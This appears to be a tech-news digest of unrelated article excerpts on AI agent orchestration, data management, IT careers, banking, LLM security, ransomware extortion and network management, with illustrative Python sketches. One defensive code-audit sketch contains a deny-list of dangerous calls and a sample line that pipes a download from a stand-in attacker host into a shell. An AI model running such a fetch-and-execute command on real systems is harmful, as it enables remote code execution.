Quote for the day:
“Don't blow off another's candle for it
won't make yours shine brighter.” -- Jaachynma N.E. Agu

It’s no longer just about building a single, super-smart model. The real power,
and the exciting frontier, lies in getting multiple specialized AI agents to
work together. Think of them as a team of expert colleagues, each with their own
skills — one analyzes data, another interacts with customers, a third manages
logistics, and so on. Getting this team to collaborate seamlessly, as envisioned
by various industry discussions and enabled by modern platforms, is where the
magic happens. But let’s be real: Coordinating a bunch of independent, sometimes
quirky, AI agents is hard. It’s not just building cool individual agents; it’s
the messy middle bit — the orchestration — that can make or break the system.
When you have agents that are relying on each other, acting asynchronously and
potentially failing independently, you’re not just building software; you’re
conducting a complex orchestra. This is where solid architectural blueprints
come in. We need patterns designed for reliability and scale right from the
start. ... For agents to collaborate effectively, they often need a shared view
of the world, or at least the parts relevant to their task. This could be the
current status of a customer order, a shared knowledge base of product
information or the collective progress towards a goal. Keeping this “collective
brain” consistent and accessible across distributed agents is tough.
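One common way to keep that "collective brain" consistent across asynchronous agents is optimistic concurrency control: each agent reads a version number alongside the value, and an update is accepted only if nothing changed in between. Below is a minimal in-process sketch of the idea; the class and key names are illustrative, and a production system would back this with a database or a consensus-backed store rather than a Python dict.

```python
import threading

class SharedState:
    """Minimal versioned key-value store that cooperating agents could share.

    Uses optimistic concurrency (compare-and-set): an update succeeds only
    if the caller read the latest version, so asynchronous agents cannot
    silently overwrite each other's changes.
    """

    def __init__(self):
        self._lock = threading.Lock()
        self._data = {}      # key -> value
        self._versions = {}  # key -> version counter

    def read(self, key):
        with self._lock:
            return self._data.get(key), self._versions.get(key, 0)

    def compare_and_set(self, key, value, expected_version):
        with self._lock:
            if self._versions.get(key, 0) != expected_version:
                return False  # another agent got there first; caller must re-read
            self._data[key] = value
            self._versions[key] = expected_version + 1
            return True

state = SharedState()
_, v = state.read("order:42")
ok_first = state.compare_and_set("order:42", {"status": "shipped"}, v)  # accepted
ok_stale = state.compare_and_set("order:42", {"status": "lost"}, v)     # rejected, stale version
```

The losing agent gets a `False` back instead of a lost update, which is exactly the failure mode that is hard to spot when agents "fail independently."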

"Unlike traditional databases, which define the schema -- the data's structure
-- before it's stored, schema-on-read defers this process until the data is
actually read or queried," says Kamal Hathi, senior vice president and general
manager of machine-generated data monitoring and analysis software at Splunk, a
Cisco company. This approach is particularly effective for
unstructured and semi-structured data, where the schema is not predefined or
rigid, Hathi says. "Traditional databases require a predefined schema, which
makes working with unstructured data challenging and less flexible." ... Manage
unstructured data by integrating it with structured data in a cloud environment
using metadata tagging and AI-driven classifications, suggests Cam Ogden, a
senior vice president at data integrity firm Precisely. "Traditionally,
structured data -- like customer databases or financial records -- reside in
well-organized systems such as relational databases or data warehouses," he
says. However, to fully leverage all of their data, organizations need to break
down the silos that separate structured data from other forms of data, including
unstructured data such as text, images, or log files. This is where the cloud
comes into play. Integrating structured and unstructured data in the cloud
allows for more comprehensive analytics, enabling organizations to extract
deeper insights from previously siloed information, Ogden says.
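The schema-on-read idea Hathi describes can be sketched in a few lines: raw, semi-structured records are stored untouched, and each query supplies only the view it needs at read time. Everything here (the field names, the toy schema dict) is illustrative of the general pattern, not a description of Splunk's actual mechanism.

```python
import json

# Raw semi-structured records stored as-is. A schema-on-write system would
# have to reject or normalize the inconsistent fields up front; schema-on-read
# keeps everything and defers interpretation.
raw_records = [
    '{"user": "ana", "latency_ms": 120}',
    '{"user": "ben", "latency_ms": "95", "region": "eu"}',  # string, extra field
    '{"user": "cho"}',                                       # field missing
]

def read_with_schema(lines, schema):
    """Apply a schema only at read time: coerce known fields, default the rest."""
    for line in lines:
        rec = json.loads(line)
        yield {field: (cast(rec[field]) if field in rec else None)
               for field, cast in schema.items()}

# The "schema" is just the view this particular query needs.
schema = {"user": str, "latency_ms": int}
rows = list(read_with_schema(raw_records, schema))
# rows -> [{'user': 'ana', 'latency_ms': 120},
#          {'user': 'ben', 'latency_ms': 95},
#          {'user': 'cho', 'latency_ms': None}]
```

A different query could pass a different schema over the same stored lines, which is the flexibility the excerpt contrasts with predefined relational schemas.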

The reasons are manifold. Inflation has eroded buying power, traditional
merit-based raises have declined, bonuses are scarcer and 2024 saw a sharp
uptick in layoffs - particularly targeting middle management and older
professionals. Unlike the "Great Resignation" of 2021, professionals today are
staying put - not from loyalty but from caution, and upskilling is the key to
ensuring their longevity. Faced with a precarious job market and declining
benefits, many IT employees are opting for stability and doubling down on
internal mobility. According to Pearson VUE's 2025 Value of IT Certification
Candidate Report, more than 80% of the respondents who hold at least one
certification said it enhanced their ability to innovate and 70% said they
experienced greater autonomy in the workplace. Even in regions where pay bumps are
smaller, the career mobility afforded by certifications is prevalent. In India,
for instance, CloudThat's IT Certifications and Salary Survey found that
Microsoft-certified professionals earn an average entry salary of $10,900, with
60% of certified workers reporting pay hikes. "The increased value in
certifications underscores their critical role in equipping professionals with
the skills needed to excel and advance in their roles. As the industry continues
to grow, certifications are becoming essential to stand out and meet the demand
for specialized skills," said Bhavesh Goswami, founder and CEO of CloudThat.

To expedite digitalisation, global policymakers are introducing regulations such
as India’s Digital Banking Units (DBUs), the EU’s PSD2/PSD3 directives, and the
GCC’s open finance guidelines. In recent years, the growth of non-bank financial
intermediaries (NBFIs) has become both more intricate and wider in scope,
demanding more effective compliance frameworks and better risk management
strategies. ... Integrating banking
directly into non-financial platforms such as e-commerce is on the rise. Based
on a report by Grand View Research, the global Banking-as-a-Service (BaaS)
market is expected to reach USD 66 billion by 2030. Retailers increasingly
partner with banks for instant, personalised offers and payments via identity
beacons, enhancing customer experiences through Gen AI-supported interactions.
For example, real-time data analytics and machine learning models are now
essential for personalised financial services. Reimagined branch visits are
becoming an emerging trend, with branches shifting to high-footfall locations
like malls. The store-like experience includes personalised offers and decision
aids, including immediate approval for flexible loans, made possible by customer
identification based on consent.

The convergence of AI with existing systems has brought technical debt into
sharp focus. While AI, and agentic AI in particular, presents transformative
opportunities, it also exposes the limitations of legacy systems and
architectural decisions made in the past. It’s essential to balance the
excitement of AI adoption with the pragmatic need to address underlying
technical debt, as we explored in our recent research. ... While AI enthusiasm
runs high, successful implementation requires careful focus on use cases that
deliver tangible business value. CIOs must lead their organizations in
identifying and executing AI initiatives that drive meaningful outcomes. That
means defining AI programs with a holistic, end-to-end vision of how they’ll
deliver value for your business. And it means taking a platform approach, as
opposed to numerous isolated PoCs. ... The traditional boundaries of IT are
dissolving. With technology now fundamentally driving business strategy, CIOs
must lead the evolution from an IT operating model to a new business
technology operating model. Recent data shows organizations that have embraced
this transformation achieved 15% higher top-line performance compared to their
peers, with potential for this gap to double by next year.

One particularly concerning area is the use of LLMs in coding applications.
“Coding agents that rely on LLM-generated code may inadvertently introduce
security vulnerabilities into production systems,” Chennabasappa warned.
“Misaligned multi-step reasoning can also cause agents to perform operations
that stray far beyond the user’s original intent.” These types of risks are
already surfacing in coding copilots and autonomous research agents, she added,
and are only likely to grow as agentic systems become more common. Yet while
LLMs are being embedded deeper into mission-critical workflows, the surrounding
security infrastructure hasn’t kept pace. “Security infrastructure for LLM-based
systems is still in its infancy,” Chennabasappa said. “So far, the industry’s
focus has been mostly limited to content moderation guardrails meant to prevent
chatbots from generating misinformation or abusive content.” That approach, she
argued, is far too narrow. It overlooks deeper, more systemic threats like
prompt injection, insecure code generation, and abuse of code interpreter
capabilities. Even proprietary safety systems that hardcode rules into model
inference APIs fall short, according to Chennabasappa, because they lack the
transparency, auditability, and flexibility needed to secure increasingly
complex AI applications.
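One guardrail that goes beyond content moderation is a static audit of LLM-generated code before it ever reaches an interpreter. The sketch below is deliberately minimal and uses a hypothetical deny-list; it illustrates the category of check Chennabasappa is pointing at, not anything a particular vendor ships. A real guardrail would add sandboxing, taint tracking, and human review.

```python
import ast

# Hypothetical deny-list of calls an autonomous coding agent should not
# execute unreviewed.
RISKY_CALLS = {"eval", "exec", "system", "popen", "rmtree"}

def audit_generated_code(source: str) -> list:
    """Statically scan LLM-generated Python for deny-listed calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            fn = node.func
            # Handles both bare names like eval(...) and attributes like os.system(...)
            name = fn.id if isinstance(fn, ast.Name) else getattr(fn, "attr", "")
            if name in RISKY_CALLS:
                findings.append(f"line {node.lineno}: call to {name}()")
    return findings

generated = "import os\nos.system('curl attacker.example | sh')\n"
print(audit_generated_code(generated))  # ['line 2: call to system()']
```

Because it inspects the syntax tree rather than the chat transcript, this kind of check catches insecure code generation and interpreter abuse that a content-moderation filter on the conversation would never see.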

In double extortion attacks, a second layer is added: attackers, having gained
access to the system, exfiltrate sensitive and valuable data. This not only
deepens the victim’s vulnerability but also increases pressure, as attackers now
hold both encrypted files and stolen information, which they can use as leverage
for further demands. The threat of double extortion becomes more severe as it
combines operational disruption (due to encrypted data and downtime) with the
risk of public exposure. Organizations unable to access their data face halted
services, financial loss, and reputational damage. ... Triple extortion expands
upon traditional and double extortion ransomware tactics by introducing a third
layer of pressure. The attack begins with data encryption and exfiltration,
similar to the double extortion model—locking the victim out of their data while
simultaneously stealing sensitive information. This stolen data gives attackers
multiple avenues to exploit the victim, who is left with no control over its
fate. The third stage involves third-party extortion. After collecting data from
the primary victim, attackers identify and target affiliated parties, such as
partners, clients, and stakeholders, whose information was also
compromised.

Your first move shouldn’t be panic-fixing everything in silence, Young says.
“You need to let people know what’s going on, including your team, your
leadership, and sometimes even your customers.” Keeping everyone in the loop
calms nerves and builds trust. Silence makes everything worse, Young warns. ...
Confusion is contagious. “Providing clarity about what’s known, what matters,
and what you’re aiming for, stabilizes people and systems,” says Leila Rao, a
workplace and executive coaching consultant. “It sets the tone for proactivity
instead of reactivity.” Simply treating symptoms will make the problem worse,
Rao warns. “Misinformation spreads, trust erodes, and well-intentioned responses
become counterproductive.” Crisis is complexity on steroids, Rao observes. “When
we center people, welcome multiple perspectives, and make space for emergence,
we move from crisis management to collective learning.” ... You can’t hide from
a crisis, and attempting to do so only compounds the damage, Hasmukh warns.
“Clear visibility into what happened allows you to respond effectively and
maintain stakeholder trust during challenging times.” Organizations that delay
acknowledging issues inevitably face greater scrutiny and damage than those that
address situations head-on.

The data is clear that there can be significant gains in productivity attached
to BYOD. Samsung estimates that workers using their own devices can gain about
an hour of productive worktime per day and Cybersecurity Insiders says that 68%
of businesses see some degree of productivity increases. Although the gains are
significant, personal devices can also distract workers more than company-owned
devices, with personal notifications, social media accounts, news, and games
being the major time-sink culprits. This has the potential to be a real issue,
as these apps can become addictive and their use compulsive. ... One challenge
for BYOD has always been user support and education. With two generations of
digital natives now comprising more than half the workforce, support and
education needs have changed. Both millennials and Gen Z have grown up with the
internet and mobile devices, which makes them more comfortable making technology
decisions and troubleshooting problems than baby boomers and Gen X. This doesn’t
mean that they don’t need tech support, but they do tend to need less
hand-holding and don’t instinctively reach for the phone to access that support.
Thus, there’s an ongoing shift to self-support resources and other, less
time-intensive, models with text chat being the most common — be it with a
person or a bot.

In-band management uses the same data path as production traffic to manage the
customer environment, while logically isolating management traffic from
production data. Although this approach can be more cost-effective, it
introduces certain risks. If a problem occurs with the production network, it
can also disrupt management access to the infrastructure, a situation referred
to as “fate sharing.” In these cases, the only viable solution may be to send an
engineer onsite to diagnose and resolve the issue. This can result in
significant costs and delays, potentially impacting the customer’s business
operations. Out-of-band management, on the other hand, uses a separate network
to provide independent access for managing the infrastructure, completely
isolating management traffic from the production network. This separation is
crucial during major disruptions like provider outages or security breaches, as
it guarantees continuous access to network devices and servers, even if the
primary production network is down or compromised. ... A secure connection links
this cloud infrastructure to the customer’s on-premises IT setup, usually
through a dedicated private network connection, SD-WAN, or an IPsec VPN. This
connection typically terminates at an on-premises router or firewall,
safeguarding access to the out-of-band management network.
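The fate-sharing problem can be made concrete with a fallback probe: try the in-band management address first, and switch to the out-of-band address when production connectivity is gone. The hostnames, port, and injectable `probe` hook below are all illustrative assumptions, not a real tool's interface.

```python
import socket

def reach(host, port, timeout=3.0, probe=None):
    """Return True if a TCP connection to host:port succeeds within timeout."""
    probe = probe or (lambda h, p: bool(socket.create_connection((h, p), timeout)))
    try:
        return bool(probe(host, port))
    except OSError:
        return False

def management_path(device, probe=None):
    """Prefer the in-band address; fall back to out-of-band on fate sharing.

    The 'oob' address would sit on a physically separate management network,
    reached through the dedicated link to the customer site.
    """
    for label in ("inband", "oob"):
        if reach(device[label], 22, probe=probe):
            return label
    return "unreachable"

device = {"inband": "10.0.0.5", "oob": "192.0.2.5"}
# Simulate a production-network outage: only the out-of-band path answers.
path = management_path(device, probe=lambda h, p: h == device["oob"])
```

The `probe` parameter exists so the logic can be exercised without a live network; in practice the default TCP connect (or an SSH health check) would run against both addresses.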